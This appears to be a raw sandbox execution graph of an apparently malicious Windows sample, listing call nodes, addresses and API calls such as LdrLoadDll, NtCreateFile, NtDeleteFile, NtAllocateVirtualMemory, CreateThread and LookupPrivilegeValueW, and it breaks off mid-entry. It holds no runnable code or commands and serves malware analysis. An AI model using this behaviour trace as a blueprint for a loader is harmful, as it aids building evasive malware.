                                                                                                                                                                                      execution_graph 79756 407ac0 79757 407ae5 79756->79757 79789 41c110 79757->79789 79760 407b39 79761 407bba 79810 40e010 LdrLoadDll NtClose 79761->79810 79765 407b68 79772 407be6 79765->79772 79797 40bd20 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 79765->79797 79766 407bd5 79767 407bf2 79766->79767 79768 407bdc 79766->79768 79814 41c190 LdrLoadDll 79767->79814 79811 41c890 79768->79811 79771 407b82 79771->79772 79798 4078f0 79771->79798 79774 407c1d 79815 40bd20 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 79774->79815 79778 407c3d 79778->79772 79816 41c1c0 LdrLoadDll 79778->79816 79780 407c62 79817 41c250 LdrLoadDll 79780->79817 79782 407c7c 79818 41c220 LdrLoadDll 79782->79818 79784 407c8b 79785 41c890 2 API calls 79784->79785 79786 407c95 79785->79786 79819 4076c0 13 API calls 79786->79819 79788 407ca9 79790 407b2f 79789->79790 79820 41d3d0 79789->79820 79790->79760 79790->79761 79792 41c300 79790->79792 79793 41d3d0 LdrLoadDll 79792->79793 79794 41c31c 79793->79794 79795 407b5d 79794->79795 79830 4622b2a 79794->79830 79795->79761 79795->79765 79797->79771 79799 407906 79798->79799 79833 41bc30 79799->79833 79801 40791f 79806 407a91 79801->79806 79854 4074d0 10 API calls 79801->79854 79803 407a05 79803->79806 79855 4076c0 13 API calls 79803->79855 79805 407a33 79805->79806 79807 41c300 2 API calls 79805->79807 79808 407a68 79807->79808 79808->79806 79856 41c900 LdrLoadDll 79808->79856 79810->79766 79812 41d3d0 LdrLoadDll 79811->79812 79813 41c8ac NtClose 79812->79813 79813->79772 79814->79774 79815->79778 79816->79780 79817->79782 79818->79784 79819->79788 79821 41d455 79820->79821 79823 41d3df 79820->79823 79821->79790 79823->79821 79824 417340 79823->79824 79825 41735a 79824->79825 79826 41734e 79824->79826 79825->79821 79826->79825 79829 4177c0 LdrLoadDll 79826->79829 79828 4174ac 79828->79821 79829->79828 79831 4622b31 79830->79831 79832 4622b3f LdrInitializeThunk 79830->79832 79831->79795 79832->79795 79857 41e3f0 79833->79857 79835 41bc47 79860 409220 79835->79860 79837 41bc62 79838 41bc83 79837->79838 79839 41bc97 79837->79839 79869 41e310 79838->79869 79866 41e290 79839->79866 79844 41e290 2 API calls 79845 41bd17 79844->79845 79851 41bfe7 79845->79851 79872 41e2d0 LdrLoadDll 79845->79872 79847 41bfcc 79848 41bfd3 79847->79848 79847->79851 79849 41e310 2 API calls 79848->79849 79850 41bfdd 79849->79850 79850->79801 79852 41e310 2 API calls 79851->79852 79853 41c03c 79852->79853 79853->79801 79854->79803 79855->79805 79856->79806 79859 41e408 79857->79859 79873 41ca30 79857->79873 79859->79835 79861 409245 79860->79861 79876 40abd0 79861->79876 79864 40929d 79864->79837 79867 41bcfe 79866->79867 79903 41c940 79866->79903 79867->79844 79906 41ca70 79869->79906 79871 41bc8d 79871->79801 79872->79847 79874 41d3d0 LdrLoadDll 79873->79874 79875 41ca4c RtlAllocateHeap 79874->79875 79875->79859 79877 40abf4 79876->79877 79878 409278 79877->79878 79879 40ac30 LdrLoadDll 79877->79879 79878->79864 79880 40c750 79878->79880 79879->79878 79881 40c77c 79880->79881 79891 41c5e0 79881->79891 79884 40c79c 79884->79864 79888 40c7d7 79889 41c890 2 API calls 79888->79889 79890 40c7fa 79889->79890 79890->79864 79892 41d3d0 LdrLoadDll 79891->79892 79893 40c795 79892->79893 79893->79884 79894 41c620 79893->79894 79895 41d3d0 LdrLoadDll 79894->79895 79896 41c63c 79895->79896 79902 4622bc0 LdrInitializeThunk 79896->79902 79897 40c7bf 79897->79884 79899 41cc10 79897->79899 79900 41d3d0 LdrLoadDll 79899->79900 79901 41cc2f 79900->79901 79901->79888 79902->79897 79904 41d3d0 LdrLoadDll 79903->79904 79905 41c95c NtAllocateVirtualMemory 79904->79905 79905->79867 79907 41d3d0 LdrLoadDll 79906->79907 79908 41ca8c RtlFreeHeap 79907->79908 79908->79871 79909 41b430 79910 41e290 2 API calls 79909->79910 79912 41b46b 79909->79912 79910->79912 79911 41b566 79912->79911 79913 40abd0 LdrLoadDll 79912->79913 79914 41b4ab 79913->79914 79915 417340 LdrLoadDll 79914->79915 79917 41b4ca 79915->79917 79916 41b4e0 Sleep 79916->79917 79917->79911 79917->79916 79920 41b0a0 LdrLoadDll 79917->79920 79921 41b280 LdrLoadDll 79917->79921 79920->79917 79921->79917 79925 46229f0 LdrInitializeThunk 79926 4217dd 79929 41dec0 79926->79929 79930 41dee6 79929->79930 79937 409bf0 79930->79937 79932 41def2 79936 41df16 79932->79936 79945 408c00 79932->79945 79977 41cab0 79936->79977 79980 409b40 79937->79980 79939 409bfd 79940 409c04 79939->79940 79992 409ae0 79939->79992 79940->79932 79946 408c27 79945->79946 80410 40b0a0 79946->80410 79948 408c39 80414 40adf0 79948->80414 79950 408c56 79958 408c5d 79950->79958 80459 40ad20 LdrLoadDll 79950->80459 79952 408f0d 79952->79936 79954 408ccc 79954->79952 79955 41e3f0 2 API calls 79954->79955 79956 408ce2 79955->79956 79957 41e3f0 2 API calls 79956->79957 79959 408cf3 79957->79959 79958->79952 80418 40de30 79958->80418 79960 41e3f0 2 API calls 79959->79960 79961 408d04 79960->79961 80430 40c2e0 79961->80430 79963 408d11 79964 416f30 10 API calls 79963->79964 79965 408d23 79964->79965 79966 416f30 10 API calls 79965->79966 79967 408d33 79966->79967 79968 408d55 79967->79968 79969 416f30 10 API calls 79967->79969 79970 416f30 10 API calls 79968->79970 79976 408d98 79968->79976 79971 408d4e 79969->79971 79973 408d6a 79970->79973 80460 40c430 LdrLoadDll 79971->80460 79973->79976 80461 40cd90 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 79973->80461 79976->79952 80442 408880 79976->80442 79978 41d3d0 LdrLoadDll 79977->79978 79979 41cacf 79978->79979 80011 41afc0 79980->80011 79984 409b66 79984->79939 79985 409b5c 79985->79984 80018 41d780 79985->80018 79987 409ba3 79987->79984 80029 409980 79987->80029 79989 409bc3 80035 4093e0 LdrLoadDll 79989->80035 79991 409bd5 79991->79939 80391 41da70 79992->80391 79995 41da70 LdrLoadDll 79996 409b0b 79995->79996 79997 41da70 LdrLoadDll 79996->79997 79998 409b21 79997->79998 79999 40dbf0 79998->79999 80000 40dc09 79999->80000 80395 40af20 80000->80395 80002 40dc1c 80003 41c5e0 LdrLoadDll 80002->80003 80004 40dc2b 80003->80004 80005 409c15 80004->80005 80399 41cbd0 80004->80399 80005->79932 80007 40dc42 80008 40dc6d 80007->80008 80403 41c660 80007->80403 80009 41c890 2 API calls 80008->80009 80009->80005 80012 41afcf 80011->80012 80013 417340 LdrLoadDll 80012->80013 80014 409b53 80013->80014 80015 41ae70 80014->80015 80016 41ae85 80015->80016 80036 41ca00 LdrLoadDll 80015->80036 80016->79985 80019 41d799 80018->80019 80037 416f30 80019->80037 80021 41d7b1 80022 41d7ba 80021->80022 80076 41d5c0 80021->80076 80022->79987 80024 41d7ce 80024->80022 80025 41c300 2 API calls 80024->80025 80026 41d802 80025->80026 80027 41e310 2 API calls 80026->80027 80028 41d829 80027->80028 80028->79987 80369 4071d0 80029->80369 80031 4099a1 80031->79989 80032 40999a 80032->80031 80382 407490 80032->80382 80035->79991 80036->80016 80038 417273 80037->80038 80039 416f44 80037->80039 80038->80021 80039->80038 80093 41c050 80039->80093 80042 417075 80099 41c760 80042->80099 80043 417058 80096 41c860 80043->80096 80046 41709c 80048 41e310 2 API calls 80046->80048 80047 417062 80047->80021 80051 4170a8 80048->80051 80049 417237 80052 41c890 2 API calls 80049->80052 80050 41724d 80156 416c50 80050->80156 80051->80047 80051->80049 80051->80050 80056 417140 80051->80056 80054 41723e 80052->80054 80054->80021 80055 417260 80055->80021 80057 4171a7 80056->80057 80059 41714f 80056->80059 80057->80049 80058 4171ba 80057->80058 80195 41c6e0 80058->80195 80061 417154 80059->80061 80062 417168 80059->80062 80194 416b10 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 80061->80194 80065 417185 80062->80065 80066 41716d 80062->80066 80065->80054 80114 4168d0 80065->80114 80102 416bb0 80066->80102 80068 41715e 80068->80021 80071 41721a 80074 41c890 2 API calls 80071->80074 80072 41717b 80072->80021 80073 41719d 80073->80021 80075 417226 80074->80075 80075->80021 80077 41d5db 80076->80077 80078 41d5ed 80077->80078 80079 41e290 2 API calls 80077->80079 80078->80024 80080 41d60d 80079->80080 80218 416520 80080->80218 80082 41d630 80082->80078 80083 416520 3 API calls 80082->80083 80084 41d652 80083->80084 80084->80078 80250 417880 80084->80250 80086 41d6da 80088 41d6ea 80086->80088 80345 41d350 LdrLoadDll 80086->80345 80261 41d1c0 80088->80261 80090 41d718 80340 41c2c0 80090->80340 80094 41d3d0 LdrLoadDll 80093->80094 80095 417029 80094->80095 80095->80042 80095->80043 80095->80047 80097 41c87c NtDeleteFile 80096->80097 80098 41d3d0 LdrLoadDll 80096->80098 80097->80047 80098->80097 80100 41c77c NtCreateFile 80099->80100 80101 41d3d0 LdrLoadDll 80099->80101 80100->80046 80101->80100 80103 416bcc 80102->80103 80104 41c6e0 LdrLoadDll 80103->80104 80105 416bed 80104->80105 80106 416bf4 80105->80106 80107 416c08 80105->80107 80108 41c890 2 API calls 80106->80108 80109 41c890 2 API calls 80107->80109 80110 416bfd 80108->80110 80111 416c11 80109->80111 80110->80072 80199 41e430 80111->80199 80113 416c1c 80113->80072 80115 41691b 80114->80115 80116 41694e 80114->80116 80117 41c6e0 LdrLoadDll 80115->80117 80118 416a99 80116->80118 80122 41696a 80116->80122 80119 416936 80117->80119 80120 41c6e0 LdrLoadDll 80118->80120 80121 41c890 2 API calls 80119->80121 80128 416ab4 80120->80128 80123 41693f 80121->80123 80124 41c6e0 LdrLoadDll 80122->80124 80123->80073 80125 416985 80124->80125 80126 4169a1 80125->80126 80127 41698c 80125->80127 80132 4169a6 80126->80132 80133 4169bc 80126->80133 80131 41c890 2 API calls 80127->80131 80211 41c720 LdrLoadDll 80128->80211 80130 416aee 80134 41c890 2 API calls 80130->80134 80135 416995 80131->80135 80136 41c890 2 API calls 80132->80136 80140 41e3f0 2 API calls 80133->80140 80142 4169c1 80133->80142 80137 416af9 80134->80137 80135->80073 80138 4169af 80136->80138 80137->80073 80138->80073 80140->80142 80141 416a27 80143 416a3e 80141->80143 80210 41c6a0 LdrLoadDll 80141->80210 80149 4169d3 80142->80149 80202 41c810 80142->80202 80145 416a45 80143->80145 80146 416a5a 80143->80146 80147 41c890 2 API calls 80145->80147 80148 41c890 2 API calls 80146->80148 80147->80149 80150 416a63 80148->80150 80149->80073 80151 416a8f 80150->80151 80205 41e110 80150->80205 80151->80073 80153 416a7a 80154 41e310 2 API calls 80153->80154 80155 416a83 80154->80155 80155->80073 80157 416c8e 80156->80157 80158 41c6e0 LdrLoadDll 80156->80158 80159 416c97 80157->80159 80160 416cac 80157->80160 80158->80157 80161 41c890 2 API calls 80159->80161 80162 416cd0 80160->80162 80163 416d1a 80160->80163 80175 416ca0 80161->80175 80164 41c7c0 2 API calls 80162->80164 80165 416d60 80163->80165 80166 416d1f 80163->80166 80167 416cf5 80164->80167 80168 416d72 80165->80168 80174 416eed 80165->80174 80170 41c810 2 API calls 80166->80170 80166->80175 80169 41c890 2 API calls 80167->80169 80171 416d77 80168->80171 80181 416db2 80168->80181 80169->80175 80172 416d4a 80170->80172 80173 41c7c0 2 API calls 80171->80173 80176 41c890 2 API calls 80172->80176 80177 416d9a 80173->80177 80174->80175 80178 41c890 2 API calls 80174->80178 80175->80055 80179 416d53 80176->80179 80182 41c890 2 API calls 80177->80182 80183 416f1e 80178->80183 80179->80055 80180 416db7 80180->80175 80185 41c7c0 2 API calls 80180->80185 80181->80180 80189 416e96 80181->80189 80184 416da3 80182->80184 80183->80055 80184->80055 80186 416dda 80185->80186 80187 41c890 2 API calls 80186->80187 80188 416de5 80187->80188 80188->80055 80189->80175 80212 41c7c0 80189->80212 80192 41c890 2 API calls 80193 416ede 80192->80193 80193->80055 80194->80068 80196 417202 80195->80196 80197 41d3d0 LdrLoadDll 80195->80197 80198 41c720 LdrLoadDll 80196->80198 80197->80196 80198->80071 80200 41ca30 2 API calls 80199->80200 80201 41e44a 80199->80201 80200->80201 80201->80113 80203 41d3d0 LdrLoadDll 80202->80203 80204 41c82c NtReadFile 80203->80204 80204->80141 80206 41e134 80205->80206 80207 41e11d 80205->80207 80206->80153 80207->80206 80208 41e3f0 2 API calls 80207->80208 80209 41e14b 80208->80209 80209->80153 80210->80143 80211->80130 80213 41d3d0 LdrLoadDll 80212->80213 80214 41c7dc 80213->80214 80217 4622a10 LdrInitializeThunk 80214->80217 80215 416ed5 80215->80192 80217->80215 80219 416531 80218->80219 80220 416539 80218->80220 80219->80082 80249 41680c 80220->80249 80346 41f3d0 80220->80346 80222 41658d 80223 41f3d0 2 API calls 80222->80223 80226 416598 80223->80226 80224 4165e6 80227 41f3d0 2 API calls 80224->80227 80226->80224 80228 41f500 3 API calls 80226->80228 80361 41f470 LdrLoadDll RtlAllocateHeap RtlFreeHeap 80226->80361 80230 4165fa 80227->80230 80228->80226 80229 416657 80231 41f3d0 2 API calls 80229->80231 80230->80229 80351 41f500 80230->80351 80232 41666d 80231->80232 80234 4166aa 80232->80234 80236 41f500 3 API calls 80232->80236 80235 41f3d0 2 API calls 80234->80235 80237 4166b5 80235->80237 80236->80232 80238 41f500 3 API calls 80237->80238 80244 4166ef 80237->80244 80238->80237 80241 41f430 2 API calls 80242 4167ee 80241->80242 80243 41f430 2 API calls 80242->80243 80245 4167f8 80243->80245 80357 41f430 80244->80357 80246 41f430 2 API calls 80245->80246 80247 416802 80246->80247 80248 41f430 2 API calls 80247->80248 80248->80249 80249->80082 80251 417891 80250->80251 80252 416f30 10 API calls 80251->80252 80256 4178a7 80252->80256 80253 4178b0 80253->80086 80254 4178e7 80255 41e310 2 API calls 80254->80255 80257 4178f8 80255->80257 80256->80253 80256->80254 80258 417933 80256->80258 80257->80086 80259 41e310 2 API calls 80258->80259 80260 417938 80259->80260 80260->80086 80362 41d050 80261->80362 80263 41d1d4 80264 41d050 LdrLoadDll 80263->80264 80265 41d1dd 80264->80265 80266 41d050 LdrLoadDll 80265->80266 80267 41d1e6 80266->80267 80268 41d050 LdrLoadDll 80267->80268 80269 41d1ef 80268->80269 80270 41d050 LdrLoadDll 80269->80270 80271 41d1f8 80270->80271 80272 41d050 LdrLoadDll 80271->80272 80273 41d201 80272->80273 80274 41d050 LdrLoadDll 80273->80274 80275 41d20d 80274->80275 80276 41d050 LdrLoadDll 80275->80276 80277 41d216 80276->80277 80278 41d050 LdrLoadDll 80277->80278 80279 41d21f 80278->80279 80280 41d050 LdrLoadDll 80279->80280 80281 41d228 80280->80281 80282 41d050 LdrLoadDll 80281->80282 80283 41d231 80282->80283 80284 41d050 LdrLoadDll 80283->80284 80285 41d23a 80284->80285 80286 41d050 LdrLoadDll 80285->80286 80287 41d246 80286->80287 80288 41d050 LdrLoadDll 80287->80288 80289 41d24f 80288->80289 80290 41d050 LdrLoadDll 80289->80290 80291 41d258 80290->80291 80292 41d050 LdrLoadDll 80291->80292 80293 41d261 80292->80293 80294 41d050 LdrLoadDll 80293->80294 80295 41d26a 80294->80295 80296 41d050 LdrLoadDll 80295->80296 80297 41d273 80296->80297 80298 41d050 LdrLoadDll 80297->80298 80299 41d27f 80298->80299 80300 41d050 LdrLoadDll 80299->80300 80301 41d288 80300->80301 80302 41d050 LdrLoadDll 80301->80302 80303 41d291 80302->80303 80304 41d050 LdrLoadDll 80303->80304 80305 41d29a 80304->80305 80306 41d050 LdrLoadDll 80305->80306 80307 41d2a3 80306->80307 80308 41d050 LdrLoadDll 80307->80308 80309 41d2ac 80308->80309 80310 41d050 LdrLoadDll 80309->80310 80311 41d2b8 80310->80311 80312 41d050 LdrLoadDll 80311->80312 80313 41d2c1 80312->80313 80314 41d050 LdrLoadDll 80313->80314 80315 41d2ca 80314->80315 80316 41d050 LdrLoadDll 80315->80316 80317 41d2d3 80316->80317 80318 41d050 LdrLoadDll 80317->80318 80319 41d2dc 80318->80319 80320 41d050 LdrLoadDll 80319->80320 80321 41d2e5 80320->80321 80322 41d050 LdrLoadDll 80321->80322 80323 41d2f1 80322->80323 80324 41d050 LdrLoadDll 80323->80324 80325 41d2fa 80324->80325 80326 41d050 LdrLoadDll 80325->80326 80327 41d303 80326->80327 80328 41d050 LdrLoadDll 80327->80328 80329 41d30c 80328->80329 80330 41d050 LdrLoadDll 80329->80330 80331 41d315 80330->80331 80332 41d050 LdrLoadDll 80331->80332 80333 41d31e 80332->80333 80334 41d050 LdrLoadDll 80333->80334 80335 41d32a 80334->80335 80336 41d050 LdrLoadDll 80335->80336 80337 41d333 80336->80337 80338 41d050 LdrLoadDll 80337->80338 80339 41d33c 80338->80339 80339->80090 80341 41d3d0 LdrLoadDll 80340->80341 80342 41c2dc 80341->80342 80368 4622d10 LdrInitializeThunk 80342->80368 80343 41c2f3 80343->80024 80345->80088 80347 41f3e0 80346->80347 80348 41f3e6 80346->80348 80347->80222 80349 41e3f0 2 API calls 80348->80349 80350 41f40c 80349->80350 80350->80222 80352 41f470 80351->80352 80353 41f4cd 80352->80353 80354 41e3f0 2 API calls 80352->80354 80353->80230 80355 41f4aa 80354->80355 80356 41e310 2 API calls 80355->80356 80356->80353 80358 41f433 80357->80358 80359 41e310 2 API calls 80358->80359 80360 4167e4 80359->80360 80360->80241 80361->80226 80363 41d06b 80362->80363 80364 417340 LdrLoadDll 80363->80364 80365 41d08b 80364->80365 80366 417340 LdrLoadDll 80365->80366 80367 41d13f 80365->80367 80366->80367 80367->80263 80367->80367 80368->80343 80370 4071e0 80369->80370 80371 4071db 80369->80371 80372 41e290 2 API calls 80370->80372 80371->80032 80378 407205 80372->80378 80373 407268 80373->80032 80374 41c2c0 2 API calls 80374->80378 80375 40726e 80377 407294 80375->80377 80379 41c9c0 2 API calls 80375->80379 80377->80032 80378->80373 80378->80374 80378->80375 80380 41e290 2 API calls 80378->80380 80385 41c9c0 80378->80385 80381 407285 80379->80381 80380->80378 80381->80032 80383 4074ae 80382->80383 80384 41c9c0 2 API calls 80382->80384 80383->79989 80384->80383 80386 41d3d0 LdrLoadDll 80385->80386 80387 41c9dc 80386->80387 80390 4622b90 LdrInitializeThunk 80387->80390 80388 41c9f3 80388->80378 80390->80388 80392 41da93 80391->80392 80393 40abd0 LdrLoadDll 80392->80393 80394 409afa 80393->80394 80394->79995 80396 40af43 80395->80396 80398 40afc0 80396->80398 80408 41c090 LdrLoadDll 80396->80408 80398->80002 80400 41cbdf 80399->80400 80401 41d3d0 LdrLoadDll 80400->80401 80402 41cbef LookupPrivilegeValueW 80401->80402 80402->80007 80404 41d3d0 LdrLoadDll 80403->80404 80405 41c67c 80404->80405 80409 4622dc0 LdrInitializeThunk 80405->80409 80406 41c69b 80406->80008 80408->80398 80409->80406 80411 40b0c7 80410->80411 80412 40af20 LdrLoadDll 80411->80412 80413 40b12a 80412->80413 80413->79948 80415 40ae14 80414->80415 80462 41c090 LdrLoadDll 80415->80462 80417 40ae4e 80417->79950 80419 40de5c 80418->80419 80420 40b0a0 LdrLoadDll 80419->80420 80421 40de6e 80420->80421 80463 40dd00 80421->80463 80424 40de89 80425 41c890 2 API calls 80424->80425 80427 40de94 80424->80427 80425->80427 80426 40dea1 80428 41c890 2 API calls 80426->80428 80429 40deb2 80426->80429 80427->79954 80428->80429 80429->79954 80431 40c2f6 80430->80431 80432 40c300 80430->80432 80431->79963 80433 40af20 LdrLoadDll 80432->80433 80434 40c371 80433->80434 80435 40adf0 LdrLoadDll 80434->80435 80436 40c385 80435->80436 80437 40c3a8 80436->80437 80438 40af20 LdrLoadDll 80436->80438 80437->79963 80439 40c3c4 80438->80439 80440 416f30 10 API calls 80439->80440 80441 40c419 80440->80441 80441->79963 80444 40889a 80442->80444 80482 40e0f0 80442->80482 80455 408bf1 80444->80455 80487 416860 80444->80487 80446 4088f6 80447 41f3d0 2 API calls 80446->80447 80446->80455 80448 408a95 80447->80448 80449 41f500 3 API calls 80448->80449 80451 408aaa 80449->80451 80450 4071d0 4 API calls 80458 408afd 80450->80458 80451->80458 80560 403660 12 API calls 80451->80560 80455->79952 80457 407490 2 API calls 80457->80458 80458->80450 80458->80455 80458->80457 80490 40c010 80458->80490 80540 40e090 80458->80540 80544 40daf0 80458->80544 80459->79958 80460->79968 80461->79976 80462->80417 80464 40dd1a 80463->80464 80472 40ddd0 80463->80472 80465 40af20 LdrLoadDll 80464->80465 80466 40dd3c 80465->80466 80473 41c340 80466->80473 80468 40dd7e 80476 41c380 80468->80476 80471 41c890 2 API calls 80471->80472 80472->80424 80472->80426 80474 41d3d0 LdrLoadDll 80473->80474 80475 41c35c 80474->80475 80475->80468 80477 41d3d0 LdrLoadDll 80476->80477 80478 41c39c 80477->80478 80481 46234e0 LdrInitializeThunk 80478->80481 80479 40ddc4 80479->80471 80481->80479 80483 40e10f 80482->80483 80484 417340 LdrLoadDll 80482->80484 80485 40e116 SetErrorMode 80483->80485 80486 40e11d 80483->80486 80484->80483 80485->80486 80486->80444 80561 40dec0 80487->80561 80489 416886 80489->80446 80491 40c02f 80490->80491 80492 40c029 80490->80492 80587 4096d0 80491->80587 80580 40d7c0 80492->80580 80495 40c03c 80496 41f500 3 API calls 80495->80496 80539 40c2d2 80495->80539 80497 40c058 80496->80497 80498 40c06c 80497->80498 80499 40e090 2 API calls 80497->80499 80500 41c110 LdrLoadDll 80498->80500 80499->80498 80501 40c0c0 80500->80501 80502 40c1a0 80501->80502 80503 41c300 2 API calls 80501->80503 80501->80539 80609 40bfb0 LdrLoadDll LdrInitializeThunk 80502->80609 80504 40c0ea 80503->80504 80504->80502 80509 40c0f6 80504->80509 80506 40c1bf 80507 40c1c7 80506->80507 80610 40bf20 LdrLoadDll NtClose LdrInitializeThunk 80506->80610 80508 41c890 2 API calls 80507->80508 80511 40c1d1 80508->80511 80512 40c149 80509->80512 80515 41c410 2 API calls 80509->80515 80509->80539 80511->80458 80514 41c890 2 API calls 80512->80514 80513 40c1e9 80513->80507 80516 40c1f0 80513->80516 80518 40c166 80514->80518 80515->80512 80517 40c208 80516->80517 80611 40bea0 80516->80611 80614 41c190 LdrLoadDll 80517->80614 80596 41b6e0 80518->80596 80522 40c21c 80615 40bd20 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 80522->80615 80523 40c17d 80523->80539 80599 407630 80523->80599 80525 40c240 80527 40c28d 80525->80527 80616 41c1c0 LdrLoadDll 80525->80616 80618 41c220 LdrLoadDll 80527->80618 80531 40c29b 80533 41c890 2 API calls 80531->80533 80532 40c25e 80532->80527 80617 41c250 LdrLoadDll 80532->80617 80534 40c2a5 80533->80534 80536 41c890 2 API calls 80534->80536 80537 40c2af 80536->80537 80538 407630 3 API calls 80537->80538 80537->80539 80538->80539 80539->80458 80541 40e0a3 80540->80541 80645 41c290 80541->80645 80545 40db27 80544->80545 80546 40db07 80544->80546 80550 40db69 80545->80550 80671 40d740 80545->80671 80546->80545 80651 40d900 80546->80651 80557 40db9b 80550->80557 80693 40cfe0 12 API calls 80550->80693 80551 40dbc1 80695 4048e0 31 API calls 80551->80695 80557->80551 80694 41ae20 13 API calls 80557->80694 80558 40dbd6 80558->80458 80559 416f30 10 API calls 80559->80550 80560->80458 80562 40dedd 80561->80562 80568 41c3c0 80562->80568 80565 40df25 80565->80489 80569 41d3d0 LdrLoadDll 80568->80569 80570 41c3dc 80569->80570 80578 4622e50 LdrInitializeThunk 80570->80578 80571 40df1e 80571->80565 80573 41c410 80571->80573 80574 41d3d0 LdrLoadDll 80573->80574 80575 41c42c 80574->80575 80579 4622c30 LdrInitializeThunk 80575->80579 80576 40df4e 80576->80489 80578->80571 80579->80576 80619 40d060 80580->80619 80582 41e3f0 2 API calls 80583 40d8f1 80582->80583 80583->80491 80584 40d7de 80586 40d8e2 80584->80586 80632 41b570 80584->80632 80586->80582 80588 4096eb 80587->80588 80589 40dd00 3 API calls 80588->80589 80595 40980b 80588->80595 80590 4097ec 80589->80590 80591 40981a 80590->80591 80592 409801 80590->80592 80593 41c890 2 API calls 80590->80593 80591->80495 80644 406320 LdrLoadDll 80592->80644 80593->80592 80595->80495 80597 40e090 2 API calls 80596->80597 80598 41b712 80596->80598 80597->80598 80598->80523 80600 407648 80599->80600 80601 40abd0 LdrLoadDll 80600->80601 80602 407663 80601->80602 80603 417340 LdrLoadDll 80602->80603 80604 407673 80603->80604 80605 40767c PostThreadMessageW 80604->80605 80606 4076ad 80604->80606 80605->80606 80607 407690 80605->80607 80606->80458 80608 40769a PostThreadMessageW 80607->80608 80608->80606 80609->80506 80610->80513 80612 40bede 80611->80612 80613 41c410 2 API calls 80611->80613 80612->80517 80613->80612 80614->80522 80615->80525 80616->80532 80617->80527 80618->80531 80620 40d093 80619->80620 80637 40b210 80620->80637 80622 40d0a5 80641 40b380 80622->80641 80624 40d0c3 80625 40b380 LdrLoadDll 80624->80625 80626 40d0d9 80625->80626 80627 40dec0 3 API calls 80626->80627 80628 40d10f 80627->80628 80629 40d116 80628->80629 80630 41e430 2 API calls 80628->80630 80629->80584 80631 40d126 80630->80631 80631->80584 80633 41b591 80632->80633 80634 417340 LdrLoadDll 80632->80634 80635 41b5b7 80633->80635 80636 41b5a4 CreateThread 80633->80636 80634->80633 80635->80586 80636->80586 80638 40b237 80637->80638 80639 40af20 LdrLoadDll 80638->80639 80640 40b273 80639->80640 80640->80622 80642 40af20 LdrLoadDll 80641->80642 80643 40b399 80642->80643 80643->80624 80644->80595 80646 41d3d0 LdrLoadDll 80645->80646 80647 41c2ac 80646->80647 80650 4622cf0 LdrInitializeThunk 80647->80650 80648 40e0ce 80648->80458 80650->80648 80652 40d930 80651->80652 80696 416220 80652->80696 80654 40d97e 80734 415000 80654->80734 80656 40d984 80770 411eb0 80656->80770 80658 40d98a 80801 414090 80658->80801 80664 40d99e 80846 4158a0 80664->80846 80666 40d9a4 80872 40fa30 80666->80872 80668 40d9bc 80883 410a80 80668->80883 80672 40d7af 80671->80672 80673 40d758 80671->80673 80672->80558 80677 40d580 80672->80677 80673->80672 80674 410cd0 10 API calls 80673->80674 80675 40d799 80674->80675 80675->80672 81210 410f20 80675->81210 80678 40d59c 80677->80678 80682 40d67b 80677->80682 80680 41c890 2 API calls 80678->80680 80678->80682 80679 40d70e 80681 40d72b 80679->80681 80684 416f30 10 API calls 80679->80684 80683 40d5bd 80680->80683 80681->80550 80681->80559 80682->80679 81271 40c980 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 80682->81271 81270 40c980 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 80683->81270 80684->80681 80686 40d6e8 80686->80679 81272 40cb40 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 80686->81272 80688 40d5f5 80690 40af20 LdrLoadDll 80688->80690 80691 40d606 80690->80691 80692 40af20 LdrLoadDll 80691->80692 80692->80682 80693->80557 80694->80551 80695->80558 80697 416248 80696->80697 80698 40af20 LdrLoadDll 80697->80698 80699 416277 80698->80699 80700 40c750 3 API calls 80699->80700 80702 4162aa 80700->80702 80701 4162b1 80701->80654 80702->80701 80703 40af20 LdrLoadDll 80702->80703 80704 4162d9 80703->80704 80705 40af20 LdrLoadDll 80704->80705 80706 4162fd 80705->80706 80888 40c810 80706->80888 80709 416363 80712 40af20 LdrLoadDll 80709->80712 80711 41633a 80713 4164e6 80711->80713 80896 415f70 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 80711->80896 80714 416383 80712->80714 80713->80654 80716 40c810 2 API calls 80714->80716 80717 4163a7 80716->80717 80718 4163ed 80717->80718 80719 4163c4 80717->80719 80721 415b80 10 API calls 80717->80721 80720 40c810 2 API calls 80718->80720 80719->80713 80897 415f70 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 80719->80897 80723 41641d 80720->80723 80721->80719 80724 416463 80723->80724 80725 41643a 80723->80725 80726 415b80 10 API calls 80723->80726 80728 40c810 2 API calls 80724->80728 80725->80713 80898 415f70 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 80725->80898 80726->80725 80729 4164c2 80728->80729 80730 41650b 80729->80730 80731 4164df 80729->80731 80733 415b80 10 API calls 80729->80733 80730->80654 80731->80713 80899 415f70 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 80731->80899 80733->80731 80735 415064 80734->80735 80736 40af20 LdrLoadDll 80735->80736 80737 415131 80736->80737 80738 40c750 3 API calls 80737->80738 80740 415164 80738->80740 80739 41516b 80739->80656 80740->80739 80741 40af20 LdrLoadDll 80740->80741 80742 415193 80741->80742 80743 40c810 2 API calls 80742->80743 80744 4151d3 80743->80744 80745 4152f3 80744->80745 80746 415b80 10 API calls 80744->80746 80745->80656 80747 4151f0 80746->80747 80748 415302 80747->80748 80906 414e20 80747->80906 80749 41c890 2 API calls 80748->80749 80751 41530c 80749->80751 80751->80656 80752 415208 80752->80748 80753 415213 80752->80753 80754 41e3f0 2 API calls 80753->80754 80755 41523c 80754->80755 80756 415245 80755->80756 80757 41525b 80755->80757 80759 41c890 2 API calls 80756->80759 80935 414d10 CoInitialize 80757->80935 80760 41524f 80759->80760 80760->80656 80761 415269 80937 41c5a0 80761->80937 80763 4152e2 80764 41c890 2 API calls 80763->80764 80765 4152ec 80764->80765 80767 41e310 2 API calls 80765->80767 80767->80745 80768 415287 80768->80763 80769 41c5a0 2 API calls 80768->80769 80942 414c40 LdrLoadDll RtlFreeHeap 80768->80942 80769->80768 80771 411ed8 80770->80771 80772 